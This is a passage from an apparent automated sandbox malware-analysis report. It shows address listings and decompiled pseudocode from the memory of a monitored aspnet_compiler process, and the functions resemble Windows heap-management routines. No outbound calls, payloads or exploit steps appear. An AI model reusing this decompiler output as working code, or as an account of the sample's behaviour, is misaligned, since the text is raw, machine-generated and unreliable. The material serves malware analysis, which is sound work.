                          0x0140d84e
                          0x0140d857
                          0x0140d818
                          0x0140d824
                          0x0140d831
                          0x0145b4a5
                          0x0145b4ab
                          0x0145b4b3
                          0x0145b4b8
                          0x0145b4bb
                          0x00000000
                          0x0145b4c1
                          0x0145b4c1
                          0x0145b4c8
                          0x00000000
                          0x0145b4ce
                          0x0145b4d4
                          0x0145b4e1
                          0x0145b4e3
                          0x0145b4e5
                          0x00000000
                          0x0145b4eb
                          0x0145b4f0
                          0x0145b4f2
                          0x0140dac9
                          0x0140dacc
                          0x0140dacf
                          0x0140dad1
                          0x0140dd78
                          0x0140dd78
                          0x0140dcf2
                          0x00000000
                          0x0140dad7
                          0x0140dad9
                          0x0140dadb
                          0x00000000
                          0x00000000
                          0x0140dae1
                          0x0140dae1
                          0x0140dae4
                          0x0140dae6
                          0x0145b4f9
                          0x0145b4f9
                          0x0145b500
                          0x0140daec
                          0x0140daec
                          0x0140daf5
                          0x0140daf8
                          0x0140dafb
                          0x0140db03
                          0x0140db11
                          0x0140db16
                          0x0140db19
                          0x0140db1b
                          0x0145b52c
                          0x0145b531
                          0x0145b534
                          0x0140db21
                          0x0140db21
                          0x0140db24
                          0x0140dcd9
                          0x0140dce2
                          0x0140dce5
                          0x0140dd6a
                          0x0140dd6d
                          0x00000000
                          0x0140dd73
                          0x0145b51a
                          0x0145b51c
                          0x0145b51f
                          0x0145b524
                          0x00000000
                          0x0145b524
                          0x0140dce7
                          0x0140dce7
                          0x0140dce7
                          0x00000000
                          0x0140dce7
                          0x00000000
                          0x0140db2a
                          0x0140db2c
                          0x0140db31
                          0x0140db33
                          0x0140db36
                          0x0140db39
                          0x0140db3b
                          0x0140db66
                          0x0140db66
                          0x0140db3d
                          0x0140db3d
                          0x0140db3e
                          0x0140db46
                          0x0140db47
                          0x0140db49
                          0x0140db4c
                          0x0140db53
                          0x0140db55
                          0x0140db58
                          0x0140db5a
                          0x0145b50a
                          0x0145b50f
                          0x0145b512
                          0x0140db60
                          0x0140db60
                          0x0140db63
                          0x0140db63
                          0x00000000
                          0x0140db63
                          0x0140db5a
                          0x0140db3b
                          0x0140db24
                          0x0140db69
                          0x0140db69
                          0x0140db6c
                          0x0140db6f
                          0x0140db74
                          0x0145b557
                          0x0145b557
                          0x0145b55e
                          0x0140db7a
                          0x0140db7c
                          0x0140db7f
                          0x0140db82
                          0x0140db85
                          0x00000000
                          0x0140db8b
                          0x0140db8b
                          0x0140db8d
                          0x0140db9b
                          0x0140db9b
                          0x0140db9d
                          0x0140dba0
                          0x0140dba2
                          0x0140dba4
                          0x0140dba7
                          0x0140dba9
                          0x0140dbae
                          0x0140dbae
                          0x0140dbb1
                          0x0140dbb4
                          0x0140dbb4
                          0x0140dbb7
                          0x0140dbba
                          0x0140dcd2
                          0x0140dcd4
                          0x00000000
                          0x0140dbc0
                          0x0140dbc0
                          0x0140dbd2
                          0x0140dbd7
                          0x0140dbda
                          0x0140dbdd
                          0x0140dbdf
                          0x00000000
                          0x0140dbe5
                          0x0140dbe5
                          0x0140dbee
                          0x0140dbf1
                          0x0145b541
                          0x0145b544
                          0x00000000
                          0x0145b546
                          0x0145b546
                          0x00000000
                          0x0145b546
                          0x0140dbf7
                          0x0140dbf7
                          0x0140dbfd
                          0x0140dbfd
                          0x0140dbff
                          0x0140dc0b
                          0x0140dc15
                          0x0140dc1b
                          0x0140dc1d
                          0x0140dc21
                          0x0140dc21
                          0x0140dc23
                          0x0140dc23
                          0x0140dc26
                          0x0140dc29
                          0x0140dc2b
                          0x00000000
                          0x00000000
                          0x0140dc31
                          0x0140dc34
                          0x0140dc36
                          0x0140dcbf
                          0x0140dcbf
                          0x0140dcc2
                          0x00000000
                          0x0140dc3c
                          0x0140dc41
                          0x0140dc43
                          0x00000000
                          0x0140dc45
                          0x0140dc45
                          0x0140dc47
                          0x00000000
                          0x0140dc4d
                          0x0140dc4d
                          0x0140dc50
                          0x0140dc52
                          0x0140dc55
                          0x0140dcfa
                          0x0140dcfe
                          0x0140dd08
                          0x0140dd0a
                          0x0140dd0c
                          0x00000000
                          0x0140dd12
                          0x0140dd15
                          0x0140dd2d
                          0x0140dd2f
                          0x0140dd32
                          0x0140dd35
                          0x00000000
                          0x0140dd35
                          0x0140dc5b
                          0x0140dc5b
                          0x0140dc5e
                          0x0140dc61
                          0x0140dc64
                          0x0140dc67
                          0x0140dc67
                          0x0140dc6a
                          0x0140dc6c
                          0x0140dc8e
                          0x0140dc8e
                          0x0140dc91
                          0x0140dc93
                          0x0140dcce
                          0x0140dcce
                          0x0140dc95
                          0x0140dc9c
                          0x0140dc6e
                          0x0140dc72
                          0x0140dc75
                          0x0140dc77
                          0x0140dc79
                          0x0145b551
                          0x0145b551
                          0x00000000
                          0x0140dc7f
                          0x0140dc7f
                          0x0140dc81
                          0x00000000
                          0x0140dc83
                          0x0140dc86
                          0x0140dc88
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0140dc88
                          0x0140dc81
                          0x0140dc79
                          0x0140dc6c
                          0x0140dc55
                          0x0140dc47
                          0x0140dc43
                          0x00000000
                          0x0140dc36
                          0x0140dc23
                          0x00000000
                          0x0140dbff
                          0x0140dbf1
                          0x0140dbdf
                          0x0140db8f
                          0x0140db92
                          0x0140db95
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0140db95
                          0x0140db8d
                          0x0140db85
                          0x0140db74
                          0x0140dc9f
                          0x0140dca2
                          0x0140dcb0
                          0x0140dcb0
                          0x0140dad1
                          0x0145b4e5
                          0x0145b4c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0140d831
                          0x00000000
                          0x0140d800
                          0x0145b47f
                          0x0145b485
                          0x00000000
                          0x0145b485
                          0x0140d665
                          0x0140d652
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0a3d1cf2e860901384a35849945a2124c2327988c644ac33a8ef5ec196df0dee
                          • Instruction ID: 67bbb2b44fae40b21d91f0e216ef8a5e358f4a72f8df2cc44597ab4f453ed196
                          • Opcode Fuzzy Hash: 0a3d1cf2e860901384a35849945a2124c2327988c644ac33a8ef5ec196df0dee
                          • Instruction Fuzzy Hash: FDE19231E002568FEB368F9AC844B6ABBB2BF55314F0441BBD9096B3B2D7349985CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E0141B236(signed int __ecx, intOrPtr __edx) {
                          				unsigned int _v8;
                          				signed int _v12;
                          				unsigned int _v16;
                          				char _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				unsigned int _t94;
                          				signed int _t96;
                          				intOrPtr _t97;
                          				unsigned int _t101;
                          				char _t103;
                          				signed int _t114;
                          				signed int _t115;
                          				signed char* _t118;
                          				intOrPtr _t119;
                          				signed int _t120;
                          				signed char* _t123;
                          				signed int _t129;
                          				char* _t132;
                          				unsigned int _t147;
                          				signed int _t157;
                          				unsigned int _t158;
                          				signed int _t159;
                          				signed int _t165;
                          				signed int _t168;
                          				signed char _t175;
                          				signed char _t185;
                          				unsigned int _t197;
                          				unsigned int _t206;
                          				unsigned int* _t214;
                          				signed int _t218;
                          
                          				_t156 = __edx;
                          				_v24 = __edx;
                          				_t218 = __ecx;
                          				_t3 = _t156 + 0xfff; // 0xfff
                          				_t210 = 0;
                          				_v16 = _t3 & 0xfffff000;
                          				if(E0141B477(__ecx,  &_v16) == 0) {
                          					__eflags =  *(__ecx + 0x40) & 0x00000002;
                          					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
                          						L32:
                          						__eflags =  *(_t218 + 0x40) & 0x00000080;
                          						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
                          							_t210 = E0149CB4F(_t218);
                          							__eflags = _t210;
                          							if(_t210 == 0) {
                          								goto L33;
                          							}
                          							__eflags = ( *_t210 & 0x0000ffff) - _t156;
                          							if(( *_t210 & 0x0000ffff) < _t156) {
                          								goto L33;
                          							}
                          							_t157 = _t210;
                          							goto L3;
                          						}
                          						L33:
                          						_t157 = 0;
                          						__eflags = _t210;
                          						if(_t210 != 0) {
                          							__eflags =  *(_t218 + 0x4c);
                          							if( *(_t218 + 0x4c) != 0) {
                          								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
                          								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
                          							}
                          						}
                          						goto L3;
                          					}
                          					_v12 = _v12 & 0;
                          					_t158 = __edx + 0x2000;
                          					_t94 =  *((intOrPtr*)(__ecx + 0x64));
                          					__eflags = _t158 - _t94;
                          					if(_t158 > _t94) {
                          						_t94 = _t158;
                          					}
                          					__eflags =  *((char*)(_t218 + 0xda)) - 2;
                          					if( *((char*)(_t218 + 0xda)) != 2) {
                          						_t165 = 0;
                          					} else {
                          						_t165 =  *(_t218 + 0xd4);
                          					}
                          					__eflags = _t165;
                          					if(_t165 == 0) {
                          						__eflags = _t94 - 0x3f4000;
                          						if(_t94 >= 0x3f4000) {
                          							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
                          						}
                          					}
                          					_t96 = _t94 + 0x0000ffff & 0xffff0000;
                          					_v8 = _t96;
                          					__eflags = _t96 - 0xfd0000;
                          					if(_t96 >= 0xfd0000) {
                          						_v8 = 0xfd0000;
                          					}
                          					_t97 = E01420678(_t218, 1);
                          					_push(_t97);
                          					_push(0x2000);
                          					_v28 = _t97;
                          					_push( &_v8);
                          					_push(0);
                          					_push( &_v12);
                          					_push(0xffffffff);
                          					_t168 = E01439660();
                          					__eflags = _t168;
                          					if(_t168 < 0) {
                          						while(1) {
                          							_t101 = _v8;
                          							__eflags = _t101 - _t158;
                          							if(_t101 == _t158) {
                          								break;
                          							}
                          							_t147 = _t101 >> 1;
                          							_v8 = _t147;
                          							__eflags = _t147 - _t158;
                          							if(_t147 < _t158) {
                          								_v8 = _t158;
                          							}
                          							_push(_v28);
                          							_push(0x2000);
                          							_push( &_v8);
                          							_push(0);
                          							_push( &_v12);
                          							_push(0xffffffff);
                          							_t168 = E01439660();
                          							__eflags = _t168;
                          							if(_t168 < 0) {
                          								continue;
                          							} else {
                          								_t101 = _v8;
                          								break;
                          							}
                          						}
                          						__eflags = _t168;
                          						if(_t168 >= 0) {
                          							goto L12;
                          						}
                          						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
                          						goto L60;
                          					} else {
                          						_t101 = _v8;
                          						L12:
                          						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
                          						_t103 = _v24 + 0x1000;
                          						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
                          						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
                          							_t103 =  *((intOrPtr*)(_t218 + 0x68));
                          						}
                          						_push(_v28);
                          						_v20 = _t103;
                          						_push(0x1000);
                          						_push( &_v20);
                          						_push(0);
                          						_push( &_v12);
                          						_push(0xffffffff);
                          						_t159 = E01439660();
                          						__eflags = _t159;
                          						if(_t159 < 0) {
                          							L59:
                          							E0142174B( &_v12,  &_v8, 0x8000);
                          							L60:
                          							_t156 = _v24;
                          							goto L32;
                          						} else {
                          							_t114 = E0142138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
                          							__eflags = _t114;
                          							if(_t114 == 0) {
                          								_t159 = 0xc0000017;
                          							}
                          							__eflags = _t159;
                          							if(_t159 < 0) {
                          								goto L59;
                          							} else {
                          								_t115 = E01417D50();
                          								_t212 = 0x7ffe0380;
                          								__eflags = _t115;
                          								if(_t115 != 0) {
                          									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          								} else {
                          									_t118 = 0x7ffe0380;
                          								}
                          								__eflags =  *_t118;
                          								if( *_t118 != 0) {
                          									_t119 =  *[fs:0x30];
                          									__eflags =  *(_t119 + 0x240) & 0x00000001;
                          									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
                          										E014B138A(0x226, _t218, _v12, _v20, 4);
                          										__eflags = E01417D50();
                          										if(__eflags != 0) {
                          											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          										}
                          										E014B1582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
                          									}
                          								}
                          								_t120 = E01417D50();
                          								_t213 = 0x7ffe038a;
                          								__eflags = _t120;
                          								if(_t120 != 0) {
                          									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          								} else {
                          									_t123 = 0x7ffe038a;
                          								}
                          								__eflags =  *_t123;
                          								if( *_t123 != 0) {
                          									__eflags = E01417D50();
                          									if(__eflags != 0) {
                          										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                          									}
                          									E014B1582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
                          								}
                          								_t129 = E01417D50();
                          								__eflags = _t129;
                          								if(_t129 != 0) {
                          									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          								} else {
                          									_t132 = 0x7ffe0388;
                          								}
                          								__eflags =  *_t132;
                          								if( *_t132 != 0) {
                          									E014AFEC0(0x230, _t218, _v12, _v8);
                          								}
                          								__eflags =  *(_t218 + 0x4c);
                          								_t214 =  *(_v12 + 0x24);
                          								if( *(_t218 + 0x4c) != 0) {
                          									_t197 =  *(_t218 + 0x50) ^  *_t214;
                          									 *_t214 = _t197;
                          									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
                          									__eflags = _t197 >> 0x18 - _t175;
                          									if(__eflags != 0) {
                          										_push(_t175);
                          										E014AFA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
                          									}
                          								}
                          								_t157 =  *(_v12 + 0x24);
                          								goto L3;
                          							}
                          						}
                          					}
                          				} else {
                          					_v16 = _v16 >> 3;
                          					_t157 = E014199BF(__ecx, _t87,  &_v16, 0);
                          					E0141A830(__ecx, _t157, _v16);
                          					if( *(_t218 + 0x4c) != 0) {
                          						_t206 =  *(_t218 + 0x50) ^  *_t157;
                          						 *_t157 = _t206;
                          						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
                          						if(_t206 >> 0x18 != _t185) {
                          							_push(_t185);
                          							E014AFA2B(_t157, _t218, _t157, 0, _t218, __eflags);
                          						}
                          					}
                          					L3:
                          					return _t157;
                          				}
                          			}






































                          0x0141b23f
                          0x0141b246
                          0x0141b249
                          0x0141b24b
                          0x0141b251
                          0x0141b258
                          0x0141b262
                          0x0141b2b2
                          0x0141b2b6
                          0x0141b456
                          0x0141b456
                          0x0141b45a
                          0x01462912
                          0x01462914
                          0x01462916
                          0x00000000
                          0x00000000
                          0x0146291f
                          0x01462921
                          0x00000000
                          0x00000000
                          0x01462927
                          0x00000000
                          0x01462927
                          0x0141b460
                          0x0141b460
                          0x0141b462
                          0x0141b464
                          0x0146292e
                          0x01462931
                          0x0146293f
                          0x01462945
                          0x01462945
                          0x01462931
                          0x00000000
                          0x0141b464
                          0x0141b2bc
                          0x0141b2bf
                          0x0141b2c5
                          0x0141b2c8
                          0x0141b2ca
                          0x014627af
                          0x014627af
                          0x0141b2d0
                          0x0141b2d7
                          0x0141b437
                          0x0141b2dd
                          0x0141b2dd
                          0x0141b2dd
                          0x0141b2e3
                          0x0141b2e5
                          0x0141b43e
                          0x0141b443
                          0x014627b6
                          0x014627b6
                          0x0141b443
                          0x0141b2f5
                          0x0141b2fa
                          0x0141b2fd
                          0x0141b2ff
                          0x0141b46f
                          0x0141b46f
                          0x0141b30a
                          0x0141b30f
                          0x0141b310
                          0x0141b315
                          0x0141b31b
                          0x0141b31c
                          0x0141b321
                          0x0141b322
                          0x0141b329
                          0x0141b32b
                          0x0141b32d
                          0x014627c2
                          0x014627c2
                          0x014627c5
                          0x014627c7
                          0x00000000
                          0x00000000
                          0x014627c9
                          0x014627cb
                          0x014627ce
                          0x014627d0
                          0x014627d2
                          0x014627d2
                          0x014627d5
                          0x014627db
                          0x014627e0
                          0x014627e1
                          0x014627e6
                          0x014627e7
                          0x014627ee
                          0x014627f0
                          0x014627f2
                          0x00000000
                          0x014627f4
                          0x014627f4
                          0x00000000
                          0x014627f4
                          0x014627f2
                          0x014627f7
                          0x014627f9
                          0x00000000
                          0x00000000
                          0x014627ff
                          0x00000000
                          0x0141b333
                          0x0141b333
                          0x0141b336
                          0x0141b336
                          0x0141b33c
                          0x0141b341
                          0x0141b344
                          0x0141b44e
                          0x0141b44e
                          0x0141b34a
                          0x0141b34d
                          0x0141b353
                          0x0141b358
                          0x0141b359
                          0x0141b35e
                          0x0141b35f
                          0x0141b366
                          0x0141b368
                          0x0141b36a
                          0x014628f2
                          0x014628fe
                          0x01462903
                          0x01462903
                          0x00000000
                          0x0141b370
                          0x0141b38c
                          0x0141b391
                          0x0141b393
                          0x0146280a
                          0x0146280a
                          0x0141b399
                          0x0141b39b
                          0x00000000
                          0x0141b3a1
                          0x0141b3a1
                          0x0141b3a6
                          0x0141b3b0
                          0x0141b3b2
                          0x0146281d
                          0x0141b3b8
                          0x0141b3b8
                          0x0141b3b8
                          0x0141b3ba
                          0x0141b3bd
                          0x01462824
                          0x0146282a
                          0x01462831
                          0x01462841
                          0x0146284b
                          0x0146284d
                          0x01462858
                          0x01462858
                          0x01462858
                          0x01462870
                          0x01462870
                          0x01462831
                          0x0141b3c3
                          0x0141b3c8
                          0x0141b3d2
                          0x0141b3d4
                          0x01462883
                          0x0141b3da
                          0x0141b3da
                          0x0141b3da
                          0x0141b3dc
                          0x0141b3df
                          0x0146288f
                          0x01462891
                          0x0146289c
                          0x0146289c
                          0x0146289c
                          0x014628b4
                          0x014628b4
                          0x0141b3e5
                          0x0141b3ea
                          0x0141b3ec
                          0x014628c7
                          0x0141b3f2
                          0x0141b3f2
                          0x0141b3f2
                          0x0141b3f7
                          0x0141b3fa
                          0x014628d9
                          0x014628d9
                          0x0141b400
                          0x0141b407
                          0x0141b40a
                          0x0141b40f
                          0x0141b413
                          0x0141b41f
                          0x0141b424
                          0x0141b426
                          0x014628e3
                          0x014628e8
                          0x014628e8
                          0x0141b426
                          0x0141b42f
                          0x00000000
                          0x0141b42f
                          0x0141b39b
                          0x0141b36a
                          0x0141b264
                          0x0141b264
                          0x0141b279
                          0x0141b27f
                          0x0141b287
                          0x0141b28c
                          0x0141b290
                          0x0141b29c
                          0x0141b2a3
                          0x014627a0
                          0x014627a5
                          0x014627a5
                          0x0141b2a3
                          0x0141b2a9
                          0x0141b2b1
                          0x0141b2b1

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                          • Instruction ID: 36c17a16cd194ab5ac8e87a0f8f23ae74f0f8fc38aa090bb5112e30cec3982b8
                          • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                          • Instruction Fuzzy Hash: 2CB1B031B0060AAFDB15CBA9C890BBFBBB9EF98204F14416BE642D73A5D770D905CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E0140849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                          				void* _t136;
                          				signed int _t139;
                          				signed int _t141;
                          				signed int _t145;
                          				intOrPtr _t146;
                          				signed int _t149;
                          				signed int _t150;
                          				signed int _t161;
                          				signed int _t163;
                          				signed int _t165;
                          				signed int _t169;
                          				signed int _t171;
                          				signed int _t194;
                          				signed int _t200;
                          				void* _t201;
                          				signed int _t204;
                          				signed int _t206;
                          				signed int _t210;
                          				signed int _t214;
                          				signed int _t215;
                          				signed int _t218;
                          				void* _t221;
                          				signed int _t224;
                          				signed int _t226;
                          				intOrPtr _t228;
                          				signed int _t232;
                          				signed int _t233;
                          				signed int _t234;
                          				void* _t237;
                          				void* _t238;
                          
                          				_t236 = __esi;
                          				_t235 = __edi;
                          				_t193 = __ebx;
                          				_push(0x70);
                          				_push(0x14cf9c0);
                          				E0144D0E8(__ebx, __edi, __esi);
                          				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                          				if( *0x14e7b04 == 0) {
                          					L4:
                          					goto L5;
                          				} else {
                          					_t136 = E0140CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                          					_t236 = 0;
                          					if(_t136 < 0) {
                          						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                          					}
                          					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                          						_t193 =  *( *[fs:0x30] + 0x18);
                          						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                          						 *(_t237 - 0x68) = _t236;
                          						 *(_t237 - 0x6c) = _t236;
                          						_t235 = _t236;
                          						 *(_t237 - 0x60) = _t236;
                          						E01412280( *[fs:0x30], 0x14e8550);
                          						_t139 =  *0x14e7b04; // 0x1
                          						__eflags = _t139 - 1;
                          						if(__eflags != 0) {
                          							_t200 = 0xc;
                          							_t201 = _t237 - 0x40;
                          							_t141 = E0142F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                          							 *(_t237 - 0x44) = _t141;
                          							__eflags = _t141;
                          							if(_t141 < 0) {
                          								L50:
                          								E0140FFB0(_t193, _t235, 0x14e8550);
                          								L5:
                          								return E0144D130(_t193, _t235, _t236);
                          							}
                          							_push(_t201);
                          							_t221 = 0x10;
                          							_t202 =  *(_t237 - 0x40);
                          							_t145 = E013F1C45( *(_t237 - 0x40), _t221);
                          							 *(_t237 - 0x44) = _t145;
                          							__eflags = _t145;
                          							if(_t145 < 0) {
                          								goto L50;
                          							}
                          							_t146 =  *0x14e7b9c; // 0x0
                          							_t235 = L01414620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                          							 *(_t237 - 0x60) = _t235;
                          							__eflags = _t235;
                          							if(_t235 == 0) {
                          								_t149 = 0xc0000017;
                          								 *(_t237 - 0x44) = 0xc0000017;
                          							} else {
                          								_t149 =  *(_t237 - 0x44);
                          							}
                          							__eflags = _t149;
                          							if(__eflags >= 0) {
                          								L8:
                          								 *(_t237 - 0x64) = _t235;
                          								_t150 =  *0x14e7b10; // 0x0
                          								 *(_t237 - 0x4c) = _t150;
                          								_push(_t237 - 0x74);
                          								_push(_t237 - 0x39);
                          								_push(_t237 - 0x58);
                          								_t193 = E0142A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                          								 *(_t237 - 0x44) = _t193;
                          								__eflags = _t193;
                          								if(_t193 < 0) {
                          									L30:
                          									E0140FFB0(_t193, _t235, 0x14e8550);
                          									__eflags = _t235 - _t237 - 0x38;
                          									if(_t235 != _t237 - 0x38) {
                          										_t235 =  *(_t237 - 0x48);
                          										L014177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                          									} else {
                          										_t235 =  *(_t237 - 0x48);
                          									}
                          									__eflags =  *(_t237 - 0x6c);
                          									if( *(_t237 - 0x6c) != 0) {
                          										L014177F0(_t235, _t236,  *(_t237 - 0x6c));
                          									}
                          									__eflags = _t193;
                          									if(_t193 >= 0) {
                          										goto L4;
                          									} else {
                          										goto L5;
                          									}
                          								}
                          								_t204 =  *0x14e7b04; // 0x1
                          								 *(_t235 + 8) = _t204;
                          								__eflags =  *((char*)(_t237 - 0x39));
                          								if( *((char*)(_t237 - 0x39)) != 0) {
                          									 *(_t235 + 4) = 1;
                          									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                          									_t161 =  *0x14e7b10; // 0x0
                          									 *(_t237 - 0x4c) = _t161;
                          								} else {
                          									 *(_t235 + 4) = _t236;
                          									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                          								}
                          								 *((intOrPtr*)(_t237 - 0x54)) = E014337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                          								_t224 = _t236;
                          								 *(_t237 - 0x40) = _t236;
                          								 *(_t237 - 0x50) = _t236;
                          								while(1) {
                          									_t163 =  *(_t235 + 8);
                          									__eflags = _t224 - _t163;
                          									if(_t224 >= _t163) {
                          										break;
                          									}
                          									_t228 =  *0x14e7b9c; // 0x0
                          									_t214 = L01414620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                          									 *(_t237 - 0x78) = _t214;
                          									__eflags = _t214;
                          									if(_t214 == 0) {
                          										L52:
                          										_t193 = 0xc0000017;
                          										L19:
                          										 *(_t237 - 0x44) = _t193;
                          										L20:
                          										_t206 =  *(_t237 - 0x40);
                          										__eflags = _t206;
                          										if(_t206 == 0) {
                          											L26:
                          											__eflags = _t193;
                          											if(_t193 < 0) {
                          												E014337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                          												__eflags =  *((char*)(_t237 - 0x39));
                          												if( *((char*)(_t237 - 0x39)) != 0) {
                          													 *0x14e7b10 =  *0x14e7b10 - 8;
                          												}
                          											} else {
                          												_t169 =  *(_t237 - 0x68);
                          												__eflags = _t169;
                          												if(_t169 != 0) {
                          													 *0x14e7b04 =  *0x14e7b04 - _t169;
                          												}
                          											}
                          											__eflags = _t193;
                          											if(_t193 >= 0) {
                          												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                          											}
                          											goto L30;
                          										}
                          										_t226 = _t206 * 0xc;
                          										__eflags = _t226;
                          										_t194 =  *(_t237 - 0x48);
                          										do {
                          											 *(_t237 - 0x40) = _t206 - 1;
                          											_t226 = _t226 - 0xc;
                          											 *(_t237 - 0x4c) = _t226;
                          											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                          											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                          												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                          												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                          													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                          													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                          													__eflags =  *((char*)(_t237 - 0x39));
                          													if( *((char*)(_t237 - 0x39)) == 0) {
                          														_t171 = _t210;
                          													} else {
                          														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                          														L014177F0(_t194, _t236, _t210 - 8);
                          														_t171 =  *(_t237 - 0x50);
                          													}
                          													L48:
                          													L014177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                          													L46:
                          													_t206 =  *(_t237 - 0x40);
                          													_t226 =  *(_t237 - 0x4c);
                          													goto L24;
                          												}
                          												 *0x14e7b08 =  *0x14e7b08 + 1;
                          												goto L24;
                          											}
                          											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                          											__eflags = _t171;
                          											if(_t171 != 0) {
                          												__eflags =  *((char*)(_t237 - 0x39));
                          												if( *((char*)(_t237 - 0x39)) == 0) {
                          													goto L48;
                          												}
                          												E014357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                          												goto L46;
                          											}
                          											L24:
                          											__eflags = _t206;
                          										} while (_t206 != 0);
                          										_t193 =  *(_t237 - 0x44);
                          										goto L26;
                          									}
                          									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                          									 *(_t237 - 0x7c) = _t232;
                          									 *(_t232 - 4) = _t214;
                          									 *(_t237 - 4) = _t236;
                          									E0143F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                          									_t238 = _t238 + 0xc;
                          									 *(_t237 - 4) = 0xfffffffe;
                          									_t215 =  *(_t237 - 0x48);
                          									__eflags = _t193;
                          									if(_t193 < 0) {
                          										L014177F0(_t215, _t236,  *(_t237 - 0x78));
                          										goto L20;
                          									}
                          									__eflags =  *((char*)(_t237 - 0x39));
                          									if( *((char*)(_t237 - 0x39)) != 0) {
                          										_t233 = E0142A44B( *(_t237 - 0x4c));
                          										 *(_t237 - 0x50) = _t233;
                          										__eflags = _t233;
                          										if(_t233 == 0) {
                          											L014177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                          											goto L52;
                          										}
                          										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                          										L17:
                          										_t234 =  *(_t237 - 0x40);
                          										_t218 = _t234 * 0xc;
                          										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                          										 *(_t218 + _t235 + 0x10) = _t236;
                          										_t224 = _t234 + 1;
